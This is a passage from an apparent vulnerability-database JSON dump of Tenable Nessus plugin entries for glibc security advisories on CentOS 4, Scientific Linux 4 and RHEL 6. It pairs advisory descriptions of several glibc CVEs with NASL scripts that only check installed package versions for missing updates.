impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 8, "reporter": "Tenable", "published": "2012-02-14T00:00:00", "title": "CentOS 4 : glibc (CESA-2012:0125)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-profile", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc", "p-cpe:/a:centos:centos:nptl-devel"], "id": "CENTOS_RHSA-2012-0125.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57923", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0125 and \n# CentOS Errata and Security Advisory 2012:0125 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57923);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/10 11:49:29\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46563, 46740, 47370, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0125\");\n\n script_name(english:\"CentOS 4 : glibc (CESA-2012:0125)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues and one bug\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nThis update also fixes the following bug :\n\n* When using an nscd package that is a different version than the\nglibc package, the nscd service could fail to start. This update makes\nthe nscd package require a specific glibc version to prevent this\nproblem. (BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-February/018427.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?04137bde\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nptl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"nscd-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:14:29", "references": ["http://www.nessus.org/u?c13b3468"], "pluginID": "61243", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nThis update also fixes the following bug :\n\n - When using an nscd package that is a different version\n than the glibc package, the nscd service could fail to\n start. This update makes the nscd package require a\n specific glibc version to prevent this problem.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 6, "reporter": "Tenable", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL4.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-12-31T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120213_GLIBC_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61243", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61243);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/31 11:35:00\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-4609\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into\nthe mtab (mounted file systems table) file via certain setuid mount\nhelpers, if the attacker were allowed to mount to an arbitrary\ndirectory under their control. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on\nsufficiently large inputs, it could cause an application using\nfnmatch() to crash or, possibly, execute arbitrary code with the\nprivileges of the application. (CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly\nescaped output as required by the POSIX specification. If an attacker\nwere able to set the locale environment variables in the environment\nof a script that performed shell evaluation on the output of the\nlocale command, and that script were run with different privileges\nthan the attacker's, it could execute arbitrary code with the\nprivileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If\nan attacker supplied a long UTF-8 string to an application linked\nagainst glibc, it could cause the application to crash.\n(CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nThis update also fixes the following bug :\n\n - When using an nscd package that is a different version\n than the glibc package, the nscd service could fail to\n start. This update makes the nscd package require a\n specific glibc version to prevent this problem.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1202&L=scientific-linux-errata&T=0&P=2559\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c13b3468\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"glibc-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-debuginfo-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-debuginfo-common-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-headers-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-profile-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"glibc-utils-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"nptl-devel-2.3.4-2.57\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"nscd-2.3.4-2.57\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:12:51", "references": ["https://access.redhat.com/security/cve/cve-2009-5064", "https://access.redhat.com/security/cve/cve-2011-1089", "http://www.nessus.org/u?056c0c27", "https://access.redhat.com/errata/RHSA-2011:1526"], "pluginID": "57011", "description": "Updated glibc packages that fix two security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nRed Hat would like to thank Dan Rosenberg for reporting the\nCVE-2011-1089 issue.\n\nThis update also fixes several bugs and adds various enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document, linked to in the References\nsection.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.", "edition": 11, "reporter": "Tenable", "published": "2011-12-06T00:00:00", "title": "RHEL 6 : glibc (RHSA-2011:1526)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-12-20T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "id": "REDHAT-RHSA-2011-1526.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57011", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1526. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57011);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2018/12/20 11:08:45\");\n\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\");\n script_bugtraq_id(46740);\n script_xref(name:\"RHSA\", value:\"2011:1526\");\n\n script_name(english:\"RHEL 6 : glibc (RHSA-2011:1526)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix two security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nRed Hat would like to thank Dan Rosenberg for reporting the\nCVE-2011-1089 issue.\n\nThis update also fixes several bugs and adds various enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document, linked to in the References\nsection.\n\nUsers are advised to upgrade to these updated glibc packages, which\ncontain backported patches to resolve these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1089\"\n );\n # https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?056c0c27\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1526\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/06\");\n script_end_attributes();\n\n 